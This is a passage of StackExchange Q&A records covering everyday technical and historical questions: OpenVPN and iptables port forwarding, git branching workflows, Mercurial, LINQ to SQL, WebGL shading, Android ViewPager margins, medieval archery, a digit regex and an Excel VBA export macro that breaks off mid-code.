I'm connecting to a VPN that allows me to forward ports to my local machine via OpenVPN since my local provder is blocking ports.\nOpenVPN works fine on my pc all connected and working but it shows me only TCP ports are open,all UDP ports closed when i connected on VPN, but when I check on some webiste port checker and paste IP of server it tells its open..\nI guess it has somehing with iptables or something like that..? Could anyone help me? THANKS\nEDIT. I made this work by doing these commands:\n<code>iptables -t nat -A PREROUTING -d SERVERIP -p UDP --dport 1234-j DNAT --to-dest 10.8.0.6:1234\n\niptables -t filter -A INPUT -p udp -d 10.8.0.6 --dport 3480 -j ACCEPT\n<\/code>\nand 10.8.0.6 is IP of OPENVPN \nComment: Sorry, this is a bit confused, how did you check that UDP port is closed (this is technically not possible like you can do with TCP port with telnet by example). In fact, what do you want to open?\nComment: First of all thanks for answering. i want to host games in ps4 so my plan was to order server setup vpn and have open ports simple as that.. but when i setup everything i saw on ps4 that nat is still not open.. Then i check on my pc with this tool and saw this:\nTCP: https:\/\/img.techpowerup.org\/190403\/capture094-20190404.jpg\nand UDP: https:\/\/img.techpowerup.org\/190403\/capture095-20190404.jpg\nComment: I think, instead of **EDIT. I made this...**, you should answer your question using what you've answered in **EDIT** and accept it after two days will expire.\nAnswer: If I understood what you are trying to achieve, you are try to do NAT from a VPS and forward TCP and UDP port to a local network reachable through a VPN tunnel (OpenVPN). This is probably not working due a routeback issue, your local network is probably configured to reach internet without using OpenVPN connection, so traffic coming from your NAT will not answering to your VPS.\nWhat you can try is proxying your traffic over a service (like nginx). Here an example.\nInstall Nginx (on your VPS):\n<code>apt install nginx\n<\/code>\nCreate a new folder dedicated for your port rules\n<code>mkdir \/etc\/nginx\/ports\/\n<\/code>\nAdd the following lines to the end of the file <code>\/etc\/nginx\/nginx.conf<\/code>\n<code>stream {\n include \/etc\/nginx\/ports\/*;\n}\n<\/code>\nFinally create any file you want with your rules, into this new folder. Here an example of tcp and udp redirect.\n<code>\nserver {\n listen 1234;\n proxy_pass <computer-ip>:1234;\n}\n\nserver {\n listen 1234 udp;\n proxy_pass <computer-ip>:1234;\n}\n\nOf course, port 1234 must be opened in your ufw as your mentioned.\n<\/code>\nComment: Im gonna try this right now and i will update results\nComment: I still didnt get it working, have i done something wrong??\nUFW: https:\/\/img.techpowerup.org\/190403\/capture096-20190404.jpg\n\nhttps:\/\/img.techpowerup.org\/190403\/capture097-20190404.jpg\nComment: ProxyPass should be the local IP, not the public one.\n","meta":{"source":"askubuntu","title":"Allowing access to my server's UDP ports when the server is connected to OpenVPN","dup_signals":{}},"subset":"stackexchange"} +{"text":"Git branch strategy for small dev team\n\nQuestion: We have a web app that we update and release almost daily. We use git as our VCS, and our current branching strategy is very simple and broken: we have a master branch and we check changes that we 'feel good about' into it. This works, but only until we check in a breaking change.\nDoes anyone have a favorite git branch strategy for small teams which meets the following requirements:\n\nWorks well for teams of 2 to 3 developers\nLightweight, and not too much process\nAllows devs to isolate work on bug fixes and larger features with ease\nAllows us to keep a stable branch (for those 'oh crap' moments when we have to get our production servers working)\n\nIdeally, I'd love to see your step-by-step process for a dev working on a new bug\nAnswer: You might benefit from the workflow Scott Chacon describes in Pro Git. In this workflow, you have two branches that always exist, master and develop.\nmaster represents the most stable version of your project and you only ever deploy to production from this branch.\ndevelop contains changes that are in progress and may not necessarily be ready for production.\nFrom the develop branch, you create topic branches to work on individual features and fixes. Once your feature\/fix is ready to go, you merge it into develop, at which point you can test how it interacts with other topic branches that your coworkers have merged in. Once develop is in a stable state, merge it into master. It should always be safe to deploy to production from master.\nScott describes these long-running branches as \"silos\" of code, where code in a less stable branch will eventually \"graduate\" to one considered more stable after testing and general approval by your team.\nStep by step, your workflow under this model might look like this:\n\nYou need to fix a bug.\nCreate a branch called myfix that is based on the develop branch.\nWork on the bug in this topic branch until it is fixed.\nMerge myfix into develop. Run tests.\nYou discover your fix conflicts with another topic branch hisfix that your coworker merged into develop while you were working on your fix.\nMake more changes in the myfix branch to deal with these conflicts.\nMerge myfix into develop and run tests again.\nEverything works fine. Merge develop into master.\nDeploy to production from master any time, because you know it's stable.\n\nFor more details on this workflow, check out the Branching Workflows chapter in Pro Git.\nComment: I think this is great, except if you create bug fix branches from the develop branch, you are forcing you can't merge it into master and deploy it without also merging in everything else \"new\" that you've not released yet, which might be a real pain if there is something in that branch that needs documenting \/ database changes or something else hard to do. I think for urgent \"hotfixes\", you should make your branch from master.\nComment: Also Scott Chacon has an excellent article on his site on how Github's workflow with Git works - http:\/\/scottchacon.com\/2011\/08\/31\/github-flow.html\nComment: At step 8, merging the develop branch into master sounds like a bad idea given that some of the code in develop might not be ready to go into production. Wouldn't we be better off merging the feature branch into master?\nComment: What if we are developing 2 separate features, F1 and F2, where F1 is to be released in a week but F2 is to be released in 2 weeks, assuming that the development of F1 and F2 coincide? Any suggestions on that?\nComment: The `develop` is an unecessary 'solution' to a problem that git doesn't have. As far as I can tell the success is due to a well written if misguided article with no comments allowed. Here's a counter-article https:\/\/barro.github.io\/2016\/02\/a-succesful-git-branching-model-considered-harmful\/\nComment: I can backup Stony's comment with practical experience that this happens more often than you'd hope. Even features can run into this problem if you start work after someone else's has begun merging for QA. You can take the branch at the previous release cut, but in practice not all developers remember.\nComment: @program247365 that link is awesome (it should be it's own answer). It's really simple, and if it's good enough for GitHub's 35 employees, it's good enough for me :)\nComment: Create a branch F1 out of develop, create another branch F2 out of develop branch. Both developers can work on their respective branch with the F2 developer frequently pulling updates from F1.\nComment: @DustinBoswell Ok, made it, it's own answer: http:\/\/stackoverflow.com\/a\/11994209\/5716\nComment: This doesn't work if you need to maintain multiple versions of a product.\nComment: @program247365 From the blog (2011): _\"That is the entire flow. It is very simple, very effective and works for fairly large teams - GitHub is **35** employees now, maybe 15-20 of whom work on the same project (github.com) \"_ - Currently, Wikipedia lists GitHub as having 745!!!\nAnswer: After coming in as a novice trying to find a straight-forward strategy to teach to other devs who have never used source control. This is the one that fit http:\/\/nvie.com\/posts\/a-successful-git-branching-model\/ I tried using the standard GIT workflow thats in the man pages but it confused me slightly and my audience completely. \nOver the past 6 months I have only had to fix conflicts twice.\nI have added steps to always test after a merge and to 'fetch and merge\" or 'pull --rebase\" a lot (once in the morning and in the afternoon) while developing features. We also used github.com as the central place to pull the latest code.\nComment: I die a little inside everytime I see someone pick up that blog post. Here's a rebuttal: https:\/\/barro.github.io\/2016\/02\/a-succesful-git-branching-model-considered-harmful\/\nComment: That is an excellent link! That workflow works superbly well for our small team who always work remotely and parallelly on multiple release versions at a time. Very well documented. Thanks Clutch!\nComment: Ah, so this is where I found that link :-) I looked at several Git strategies before setting up my first Git project (I have moved from SCCS to CVS to SVN over the years and now I wanted to try Git for a new project) and this was the one that made the most sense to me. I recognize your post so I'm pretty sure this is where I found it. So Thanks - it works wonderfully well!\nComment: I share the same feeling with you @TimAbell; I strongly feel it not right when the `default master branch` is NOT used the most often be developer in this `A successful Git branching model`\nComment: Your having to fix conflicts twice might be circumvented by using [git rerere](https:\/\/git-scm.com\/docs\/git-rerere). Some background can be found in [Fix conflicts only once with git rerere](https:\/\/medium.com\/@porteneuve\/fix-conflicts-only-once-with-git-rerere-7d116b2cec67).\nAnswer: (Made my comment above it's own answer, as I should have initially.)\nFrom Scott Chacon of Github:\n\nHow We Do It So, what is GitHub Flow?\n\nAnything in the master branch is deployable \nTo work on something new, create a descriptively named branch off of master (ie:\n new-oauth2-scopes) \nCommit to that branch locally and regularly push your work to the same named branch on the server \nWhen you need feedback or help, or you think the branch is ready for merging, open a\n pull request \nAfter someone else has reviewed and signed off on the\n feature, you can merge it into master\nOnce it is merged and pushed to 'master', you can and should deploy immediately\n\nSee the entire article for more details: http:\/\/scottchacon.com\/2011\/08\/31\/github-flow.html\nNote that \"pull requests\" are a Github invention, and it's something that's baked into their website, not Git itself: https:\/\/help.github.com\/articles\/using-pull-requests\/\nComment: With a smaller team and devs less experienced with git, this workflow's simplicity wins out. The only thing we do differently is having a 'staging' branch between the feature branch and master that acts as a live QA site for non devs to okay the feature in a production like environment.\nComment: @Squadrons sounds like you need [octopus deploy](https:\/\/octopus.com\/) for that, that has gates built in to ok\/deny builds getting onto different environments and doesn't pollute your source control with such things.\nComment: Creating feature branches off of master and then merging them back in for deployment is OK, so long as you have a tag so there's a safe rollback point. Deployments don't always go according to plan. Whether you believe in \"roll forward only\" doesn't matter much when you're haemorrhaging money.\nAnswer: Use the <code>master<\/code> branch as your development branch and create release branches for performing bug fixes.\nAny new features will go on <code>master<\/code> during the development window (either committed directly or as topic branches with pull-requests, up to you -- not shown in graphic). Once all your planned features are implemented, enter feature freeze, and perform testing. When you're happy, tag the release on <code>master<\/code> as <code>v1.0<\/code>.\nOver time your users will find bugs in <code>v1.0<\/code> so you'll want to create a branch from that tag (e.g. name it after the release <code>1.0<\/code>) and fix those bugs in the branch. When you've got enough bugs fixed that you think it warrants a new release then tag it as <code>v1.0.1<\/code> and merge it back into <code>master<\/code>.\nMeanwhile a new development window can be happening on the <code>master<\/code> branch which will eventually be tagged as <code>v1.1<\/code>.\nRinse & repeat.\nThis follows Semantic Versioning numbering logic.\n<code> ---------(v1.0)--------------------------------(v1.1)-----------------------------> master\n \\ \\ \n ---(v1.0.1)---(v1.0.2)---> 1.0 ---(v1.1.1)---(v1.1.2)---> 1.1\n<\/code>\nComment: Don't forget to merge your `1.0.1` changes back into `master`\nComment: cherry-pick is a better option for retrieving release changes into master\nComment: And always keep in mind to rebase `1.1` on master after merging `1.0.1` - this helps minimize confiction.\nComment: No. Don't merge release branches back into master! It can give you all sorts of headaches that you do not need (merging in release-only stuff, merge conflicts with newer releases, breaking builds, non-linear history, etc. Believe me, I've seen it happen more than once). Instead, treat releases as forks. See http:\/\/www.bitsnbites.eu\/a-stable-mainline-branching-model-for-git\/\nComment: @NamGVU I wouldn't recommend that. `1.1` is a release branch and has tags representing the exact state of one or more releases. Rebasing that branch would cause you to lose that representation. I'd strongly recommend setting your release branches to deny force pushes to prevent this.\nAnswer: In a VCS, having just a \"master\" branch shows quickly its limits because you cannot pursue all the development effort at the same time on one branch.\nThat means you need to know when to branch.\nBut in a DVCS (as in \"Decentralized\" VCS), you also have a publication issue, with branches you keep local to your repositories, and branches you are pushing to or pulling from.\nIn this context, start by identifying your concurrent development effort, and decide on a publication (push\/pull) process. For instance (and this is not the only way):\n\nprod is a read-only public branch with the code in production. Everyone could pull from it in order to:\n\nrebase its current development on top of it (for local testing, or for integrating on the local dev repo a hotfix done in the prod repo on the prod branch)\nbranch to do new features (from a known stable code)\nbranch to start the next release branch (the one which is to be in production)\nno one should push directly to prod (hence the read-only)\n\nrelease is a read-write consolidation branch, where the relevant commits are cherry-picked to be part of the next release.\nEveryone can push to release to update the next release.\nEveryone can pull from said release in order to update his\/her local consolidation process.\nfeatureX is a private read-write branch (in that it does not need to be push to the central prod repo), and can be pushed\/pulled between dev repos. It represents middle to long term effort, different from the daily dev\nmaster represents the current dev, and is pushed\/pulled between the dev repos.\n\nOther release management processes exist, as this SO question attests.\nAnswer: Read through ReinH's Git Workflow for Agile teams here: http:\/\/reinh.com\/blog\/2009\/03\/02\/a-git-workflow-for-agile-teams.html\nThis works very well for small teams. The goal here is to make sure everything that might be potentially unstable goes in to a branch of some kind. Only merge back to master when you are ready for everyone working outside of the feature branch to use it.\nNote: this strategy is hardly git specific, but git makes implementing this strategy pretty easy.\n","meta":{"source":"stackoverflow","title":"Git branch strategy for small dev team","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to fetch the last changeset infomation from a remote mercurial repository without pulling?\n\nQuestion: Working on the same project from different machines using bitbucket\/github as a central repo, many times I want to check out the most recent changeset in the remote central repo before doing anything from a local machine, is there a way to do that, I would imagine something similar to <code>hg tip<\/code> but reporting the remote repo instead of the local one. Thanks.\nEDIT:\nI only need the description of the last changeset, rather than the content, just to remind myself what stuffs I committed last time.\nAnswer: <code>hg incoming<\/code> will show you what will come if you pull. If you just want the latest change\n<code>hg incoming -n -l1\n<\/code>\nhowever seeing all of them would be preferable for any use I can think of\nyou comment about seeing what you committed last time confuses me however as this commit will be in your local repo already presumably (unless you are talking about using different local repos at different revisions?)\nComment: thanks, that does the trick. Yep, I am using different local repos at different revisions, and you are right, simply doing \"hg incoming\" would be more preferable, I assumed there is only one changeset difference between the local and remote repos when I was asking the question.\nAnswer: Mercurial only clones full repositories, but most hosting sites, including github and bitbucket, make available links to download a tarball of any given revision, including 'tip'.\nComment: I don't need the full repo nor the full package, but only the description of the last commit.\nComment: Ah, I totally didn't get that from your pre-edit question. Glad someone else did.\n","meta":{"source":"stackoverflow","title":"How to fetch the last changeset infomation from a remote mercurial repository without pulling?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to add field not mapped to table in Linq to Sql\n\nQuestion: In Entity Framework I can apply <code>NotMapped<\/code> attribute to a property which I do NOT want to create a column in a database table for. How to get the same effect for auto generated classes in DBML file?\nI have a <code>StoredProcedure<\/code> that returns some additional fields.\nI called <code>SP<\/code> like:\n<code>[global::System.Data.Linq.Mapping.FunctionAttribute(Name = \"dbo.sp_GetSupplierArticles\")]\npublic ISingleResult<SupplierArticle> GetSupplierArticles([global::System.Data.Linq.Mapping.ParameterAttribute(DbType = \"BigInt\")] long mainArticleId, [global::System.Data.Linq.Mapping.ParameterAttribute(DbType = \"BigInt\")] long? userId)\n{\n IExecuteResult result = this.ExecuteMethodCall(this, ((MethodInfo)(MethodInfo.GetCurrentMethod())), mainArticleId, userId);\n return ((ISingleResult<SupplierArticle>)(result.ReturnValue));\n}\n<\/code>\nNecessary field I added into the separated partial class. Without any additional attributes it returns default value for my and applied <code>[Column(IsDbGenerated = false)]<\/code> in the separated partial class:\n<code>public partial class SupplierArticle\n{\n [Column(IsDbGenerated = false)]\n public double Extra { get; set; }\n}\n<\/code>\nSo it works until I try to get <code>SupplierArticle<\/code> using another query (not my stored procedure):\n<code>db.LoadOptions = db.GenerateDataLoadOptions(entitiesToInclude);\nvar query =\n from shoppingCartItem in db.ShoppingCartItems\n where shoppingCartItem.UserId == userId\n select shoppingCartItem;\nreturn query.ToList();\n<\/code>\nMy entity is loaded due to <code>LoadOptions<\/code> (passed in <code>entitiesToInclude<\/code> parameter).\nIn this query and another which try to load \"poor\" entity with properties that defined in .dbml file I get exception:\nInvalid column name 'Extra' and the same message for each additional property.\nWhat is the proper way to extend entity or how to avoid that exception?\nUPD:\nIf I remove all attributes exception no longer occurs. But added properties are not initialized when <code>SP<\/code> returns a result.\nComment: @Gert, suggested answer is not acceptable for me. I tried that way but does not work.\nComment: @GertArnold, please approve my question. Thanks\nComment: If I understand correctly, cant you create a new `model` with the required fields?\nComment: Also, if you are trying to extend a EF generated class; it should be in the same namespace.\nComment: @TheUknown, I can create and I did it in the same namespace in partial class, so I just extended auto generated class. But properties without `Column` attribute are not mapped and always contain default value of their type even Stored Procedure returns columns with the same name. After adding `Column` attribute it works fine with `SP` but not with a normal LINQ query which also try to get values that are not exist in the table.\nComment: What if you just create a subclass from SupplierArticle and add Extra field to it. The instance you get from linq you can pass to this SupplierArticleSubclass and initialize additional fields\nAnswer: I would suggest creating a complex type for that stored procedure. I would even go as far as creating complex types for all of your stored procedures as this is best practice. You can then add an extension method, or a method to your partial classes that will convert the complex type returned from the stored procedure to it's related entity, and vice versa. Another option would be to include a foreign key to your complex stored procedure type, and a navigation property pointing to the correct entity. \nThese are, of course, solutions to a problem that EF itself doesn't address. This is expected as EF is an ORM and is not concerned with what's not persisted.\nAnswer: A SQL View could be used if you wanted to. The View is composible and LINQ to SQL does not distinguish it from a Table. First rename the original table. Then make a View with the same name as the original table, while including the extra column with a default value. Let the Stored Procedure use the table with the new name. Of course any other SQL objects with references to the table need to be updated with the new table name. Now both LINQ to SQL and the SP will be happy.\n","meta":{"source":"stackoverflow","title":"How to add field not mapped to table in Linq to Sql","dup_signals":{}},"subset":"stackexchange"} +{"text":"Computing half vector on WebGL\n\nQuestion: http:\/\/www.lighthouse3d.com\/opengl\/glsl\/index.php?ogldir2 shows the following:\n\nH = Eye - L\n\nI did the following on my WebGL vertex shader to compute the half-vector:\n<code>vec4 ecPosition = u_mvMatrix * vec4(a_position.xyz, 1.0); \/\/ Get the eye coordinate position\nvec3 eyeDirection = normalize(-ecPosition.xyz); \/\/ Get the eye direction\nv_halfVector = normalize(eyeDirection + lightDirection); \/\/ Compute and normalize the half-vector\n<\/code>\nBut I am not sure if the above code snippets are correct.\nAny pointer\/help is appreciated. Thanks in advance for your help.\nEDIT: It seems the correct code should be\n<code>vec4 ecPosition = u_mvMatrix * vec4(a_position.xyz, 1.0); \/\/ Position in the eye coordinate position\nvec3 ecLightPosition = (u_mvMatrix * lightPosition).xyz; \/\/ Light position in the eye coordinate\nvec3 lightDirection = ecLightPosition - ecPosition.xyz \/\/ Light direction\nvec3 eyeDirection = (-ecPosition.xyz); \/\/ Eye direction\nv_halfVector = normalize(eyeDirection + lightDirection); \/\/ Compute and normalize the half-vector\n<\/code>\nAnswer: Assuming you're trying to get the average of the eye and light vectors, shouldn't that last line be \"normalize(eyeDirection + lightDirection)\" instead? Also, it might make more sense to invert the light vector instead of the eye since it's coming out of the surface.\nI'm not an expert here, so take my advice with a huge grain of salt. :)\n","meta":{"source":"stackoverflow","title":"Computing half vector on WebGL","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to remove the space between two fragments in android view pager?\n\nQuestion: How can i remove the space between two fragment view in view pager. I tried the following code, it's working in higher end devices, when i goes to lower end both fragement are merged.\n<code>private void screenDensityCheck(ViewPager pager)\n {\n\n float density = FragmentMainActivityHolder.this.getResources()\n .getDisplayMetrics().density;\n if (density >= 4.0)\n {\n pager.setPageMargin(-8 );\n Log.e(\"Mobile screen category===>>>>>>>>>\", \"xxxhdpi screen\");\n } else if (density >= 3.0)\n {\n pager.setPageMargin(-21);\n Log.e(\"Mobile screen category===>>>>>>>>>\", \"xxhdpi screen\");\n } else if (density >= 2.0)\n {\n pager.setPageMargin(-16);\n Log.e(\"Mobile screen category===>>>>>>>>>\", \"xhdpi screen\");\n } else if (density >= 1.5)\n {\n pager.setPageMargin(-26);\n Log.e(\"Mobile screen category===>>>>>>>>>\", \"hdpi screen\");\n } else if (density >= 1.0)\n {\n pager.setPageMargin(-26);\n Log.e(\"Mobile screen category===>>>>>>>>>\", \"mdpi\");\n } else\n {\n pager.setPageMargin(-35);\n Log.e(\"Mobile screen category===>>>>>>>>>\", \"ldpi\");\n }\n }\n<\/code>\nComment: final int pageMargin = (int) TypedValue.applyDimension(\n TypedValue.COMPLEX_UNIT_DIP, 4, getResources()\n .getDisplayMetrics()); is this code helpful to you ??\nComment: @andruboy: shall i use this for all type screen resolution?\nComment: did you try this ?? just try it :)\nComment: @andruboy: sorry there is some space b\/w the fragment one and two\nComment: @andruboy: dude, i set 8 instead of 4, it seems looking great, this change will cause any serious problem?\nComment: No but if it is helping you than do it :) should i post as answer ??\nComment: See i have posted as answer\nAnswer: hey this code helps you :) \n<code>final int pageMargin = (int) TypedValue.applyDimension( TypedValue.COMPLEX_UNIT_DIP, 8, getResources() .getDisplayMetrics());\nviewPager.setPageMargin(pageMargin);\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to remove the space between two fragments in android view pager?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Did English archers use thumb rings?\n\nQuestion: Essex Dogs by Dan Jones describes in passing English or Welsh archers 1 using thumb rings during the hundred year's war.\nI can find (unreliable) references to Roman thumb rings, and certainly the Romans encountered Asiatic archers, so it is not implausible. And Western European archers would have encountered Huns (plus the crusades). It is quite plausible.\nBut I've found no record of Asiatic\/thumb draw in any of my sources on English Archery. I'm reluctant to conclude that absence of evidence is evidence of absence.\nIs there a fundamental reason why Western\/English archers preferred the Mediterranean draw?\n\n1 I listened to it in an audio book which makes it very difficult to go back and check. I think the reference is to the English archer, but even the Welsh archers are fighting (most of the time) in support of the English army. It is also possible that I misunderstood a reference to an ornamental ring as a reference to an archer's thumb ring.\nComment: Another 'lack of evidence' entry would be the lack of any thumb rings on the [Mary Rose](https:\/\/maryrose.org\/meet-the-soldiers\/#archery). If thumb rings were in use you would expect to find them amongst the 137 intact bows and 3500 arrows found on this wreck.\nComment: Excellent point!!\nAnswer: \nIs there a fundamental reason why Western\/English archers preferred the Mediterranean draw?\n\nI don't know or can't find reliable sources, but as an archer for decades, I can see a good and practical reason why they wouldn't prefer the Mongolian draw (or the Asian thumb draw) because it is far less easy to learn, and mostly intended for use by mounted archers (for that, it has a different draw length1, and the arrow is placed differently):\n\nHaving the ability to better hold the arrow in place is ideal for mounted archers who have to contend with the vibrations and movements of their mounts. Archery Thumb Rings: Eastern Draw\n\nAs early western armies mainly used peasants\/poor as archers, bowmen fought on foot. They needed little training as they already were using bows to hunt, and often were required to be trained on archery (with a Mediterranean draw they knew\/were taught with). Of course, armies fought foreigners, and probably learnt their opponent's methods\/strategies, as well as travelers who brought back hunting\/fighting technique, but it must have been marginal amongst archers.\n1. Archers using the Mongolian draw are placing their draw hand near their front shoulder, cheek, ear, or past their face. It usually extends the draw.\nComment: mounted archers probably initiated and developped in middle-east\/Asia before spreading in other parts of the world, but european archers were footed.\nComment: I'm not sure that much of the last paragraph actually applies to the English\/Welsh archers of the Hundred Years War period. While they fought the major battles on foot, there were mounted archers used in the chevauch\u00e9es against the French. Effective use of the longbow required regular practice and it wasn't easy to just pick up and use one (which is why inferior firearms replaced the bows - the firearms were easier to master). In this period, hunting was the domain of the uppermost classes. The land, and the animals in it, was the property of the king. Poaching could get you hanged.\nComment: English longbowmen typically weren't mounted.\nComment: I'd be quite surprised if the mounted archers in chevauch\u00e9es used longbows while mounted. I could envision them dismounting to shoot, or shooting a smaller hunting bow. (My understanding is that nobles hunted with shorter handbows commonly, but the bow and the technique were distinct from longbow). Both the length of the longbow, and the posture used for the longbow would make mounted archery quite difficult. I'd be very happy to learn differently.\n","meta":{"source":"history.stackexchange","title":"Did English archers use thumb rings?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Regex for 8-digit expression without hyphen or letters\n\nQuestion: Currently, I have this:\n<code>Regex folderRegex = new Regex(@\"^.{8})([0-9]+)?[1-9]+([0-9]+)?$\");\n<\/code>\nI need the string to have exactly 8 digits. Without hyphens or letters. Would my regex do that?\nAnswer: I think you need a very simple pattern.\n<code>^\\d{8}$\n<\/code>\nShort description\n\nAssert position at the beginning of the string <code>^<\/code>\nMatch a single digit 0..9 <code>\\d<\/code>\n\nExactly 8 times <code>{8}<\/code>\n\nAssert position at the end of the string (or before the line break at the end of the string, if any) <code>$<\/code>\nAnswer: You can also do the same thing using a character class with a grouping range. \n<code>Regex folderRegex = new Regex(@\"^[0-9]{8}$\");\n<\/code>\nRegular expression:\n<code>[0-9]{8} any character of: '0' to '9' (8 times)\n<\/code>\nAnswer: Assuming from what is given in your question that you do not want your string of eight digits to start with a <code>0<\/code>, this should do:\n<code>^[1-9]\\d{7}$\n<\/code>\n","meta":{"source":"stackoverflow","title":"Regex for 8-digit expression without hyphen or letters","dup_signals":{}},"subset":"stackexchange"} +{"text":"Excel ScreenUpdating false and still flickering on Copy Paste to another worksheet\n\nQuestion: I am beginner and still learn about programming on macro VBA excel. I need help from community to solve my problem on macro code on excel\n<code>Sub export_data()\n\nWith Application\n .ScreenUpdating = False\n .Calculation = xlManual 'sometimes excel calculates values before saving files\nEnd With\n\nDim wsCopy As Worksheet\nDim wsDest As Worksheet\nDim wsDest2 As Worksheet\nDim lCopyLastRow As Long\nDim lDestLastRow As Long\nDim lDestLastRow2 As Long\nDim i As Long\nDim check As Long\n\n 'Set variables for copy and destination sheets\n Set wsCopy = Workbooks(\"Book 1.xlsm\").Worksheets(\"Sheet 1\")\n Set wsDest = Workbooks(\"Book 2.xls\").Worksheets(\"Sheet 1\")\n Set wsDest2 = Workbooks(\"Book 2.xls\").Worksheets(\"Sheet 2\")\n\n '1. Find last used row in the copy range based on data in column A\n lCopyLastRow = wsCopy.Range(\"J10:J16\").Find(what:=\"\", LookIn:=xlValues).Offset(-1).Row\n\n '2. Find first blank row in the destination range based on data in column A\n 'Offset property moves down 1 row\n lDestLastRow = wsDest.Cells(wsDest.Rows.Count, \"J\").End(xlUp).Offset(1).Row\n lDestLastRow2 = wsDest2.Cells(wsDest2.Rows.Count, \"A\").End(xlUp).Offset(1).Row\n\n wsCopy.Unprotect \"pass\"\n\n For i = 10 To 15\n If Range(\"W\" & i) <> \"\" And Range(\"S\" & i) = \"\" Then\n MsgBox \"please fill column S\"\n GoTo protect\n\n ElseIf Range(\"K\" & i) <> \"\" And Range(\"X\" & i) = \"\" Then\n MsgBox \"please fill column X\"\n GoTo protect\n\n ElseIf Range(\"W\" & i) <> \"\" And Range(\"Y\" & i) = \"\" Then\n MsgBox \"please fill column Y\"\n GoTo protect\n\n ElseIf Range(\"W\" & i) <> \"\" And Range(\"AB\" & i) = \"\" Then\n MsgBox \"please fill column AB\"\n GoTo protect\n\n ElseIf Range(\"W\" & i) <> \"\" And Range(\"AA\" & i) = \"\" Then\n MsgBox \"please fill column AA\"\n GoTo protect\n\n ElseIf Range(\"W\" & i) <> \"\" And Range(\"AC\" & i) = \"\" Then\n MsgBox \"please fill column AC\"\n GoTo protect\n End If\n Next i\n\n If Range(\"W\" & 10) <> \"\" And Range(\"AD\" & 10) = \"\" Then\n MsgBox \"please fill column AD\"\n GoTo protect\n End If\n\n If WorksheetFunction.CountIf(wsDest2.Range(\"B10:B\" & lDestLastRow2 - 1), wsCopy.Range(\"B10\")) > 0 Then\n check = MsgBox(\"Double?\", _\n vbQuestion + vbYesNo, \"Double data\")\n If check = vbYes Then\n GoTo export\n Else\n GoTo protect\n End If\n Else\n GoTo export\n End If\n\n If Range(\"Q5\") <> \"\" Then\n check = MsgBox(\"sure?\", _\n vbQuestion + vbYesNo, \"Manual override\")\n If check = vbYes Then\n GoTo export\n Else\n GoTo protect\n End If\n Else\n GoTo export\n End If\n\nWith Application\n .ScreenUpdating = True\n .Calculation = xlCalculationAutomatic\nEnd With\n\nexport:\n\n '3. Copy & Paste Data\n For Each cell In wsCopy.Range(\"AB10:AB15\")\n cell.Value = UCase(cell.Value)\n Next cell\n\n wsDest.Rows(lDestLastRow & \":\" & lDestLastRow + lCopyLastRow - 10).Insert shift:=xlShiftDown\n wsDest.Range(\"A\" & lDestLastRow) = WorksheetFunction.Max(wsDest.Range(\"A10:A\" & lDestLastRow)) + 1\n wsDest.Range(\"L\" & lDestLastRow - 1).Copy\n wsDest.Range(\"L\" & lDestLastRow).Resize(lCopyLastRow - 9, 1).PasteSpecial Paste:=xlPasteFormulas\n wsDest.Range(\"R\" & lDestLastRow - 1).Copy\n wsDest.Range(\"R\" & lDestLastRow).Resize(lCopyLastRow - 9, 1).PasteSpecial Paste:=xlPasteFormulas\n wsCopy.Range(\"B10:K\" & lCopyLastRow).Copy\n wsDest.Range(\"B\" & lDestLastRow).PasteSpecial Paste:=xlPasteValues\n wsCopy.Range(\"B10:K\" & lCopyLastRow).Copy\n wsDest.Range(\"B\" & lDestLastRow).PasteSpecial Paste:=xlPasteValues\n wsCopy.Range(\"M10:Q\" & lCopyLastRow).Copy\n wsDest.Range(\"M\" & lDestLastRow).PasteSpecial Paste:=xlPasteValues\n wsCopy.Range(\"S10:AF\" & lCopyLastRow).Copy\n wsDest.Range(\"S\" & lDestLastRow).PasteSpecial Paste:=xlPasteValues\n\n For Each cell In wsDest.Range(\"B\" & lDestLastRow & \":B\" & lDestLastRow + lCopyLastRow - 10)\n cell.Value = wsCopy.Range(\"B10\").Value\n Next cell\n\n 'COPY DATA for book 2 sheet 2\n wsDest2.Rows(lDestLastRow2).Insert shift:=xlShiftDown\n\n wsDest2.Range(\"A\" & lDestLastRow2) = wsDest2.Range(\"A\" & lDestLastRow2 - 1).Value + 1\n\n wsCopy.Range(\"B10:C10\").Copy\n wsDest2.Range(\"B\" & lDestLastRow2).PasteSpecial Paste:=xlPasteValues\n\n wsCopy.Range(\"E10:Z10\").Copy\n wsDest2.Range(\"E\" & lDestLastRow2).PasteSpecial Paste:=xlPasteValues\n\n wsCopy.Range(\"AD10:AF10\").Copy\n wsDest2.Range(\"AD\" & lDestLastRow2).PasteSpecial Paste:=xlPasteValues\n\n Dim r As Range, tabel As Range, xTabel As Range\n Dim x As Integer, xMax As Long\n 'y As Long, yMax As Long\n Dim textTabel As String\n Set tabel = wsCopy.Range(\"d10:d\" & lCopyLastRow)\n Set r = wsDest2.Range(\"d\" & lDestLastRow2)\n\n xMax = tabel.Rows.Count\n For x = 1 To xMax\n Set xTabel = tabel.Range(Cells(x, 1), Cells(x, 1))\n textTabel = Trim(xTabel.Text)\n If x = 1 Then\n textTabel = textTabel\n 'r.Offset(x - 1, 0).ClearContents\n Else\n textTabel = \"& \" & textTabel\n End If\n r = r & textTabel\n Next x\n\n Dim r2 As Range, tabel2 As Range, xTabel2 As Range\n Dim x2 As Integer, xMax2 As Long\n 'y As Long, yMax As Long\n Dim textTabel2 As String\n Set tabel2 = wsCopy.Range(\"AC10:AC\" & lCopyLastRow)\n Set r2 = wsDest2.Range(\"AC\" & lDestLastRow2)\n\n xMax2 = tabel2.Rows.Count\n For x2 = 1 To xMax2\n Set xTabel2 = tabel2.Range(Cells(x2, 1), Cells(x2, 1))\n textTabel2 = Trim(xTabel2.Text)\n If x2 = 1 Then\n textTabel2 = textTabel2\n 'r.Offset(x - 1, 0).ClearContents\n Else\n textTabel2 = \"& \" & textTabel2\n End If\n r2 = r2 & textTabel2\n Next x2\n\n Dim r3 As Range, tabel3 As Range, xTabel3 As Range\n Dim x3 As Integer, xMax3 As Long\n 'y As Long, yMax As Long\n Dim textTabel3 As String\n Set tabel3 = wsCopy.Range(\"AA10:AA\" & lCopyLastRow)\n Set r3 = wsDest2.Range(\"AA\" & lDestLastRow2)\n\n xMax3 = 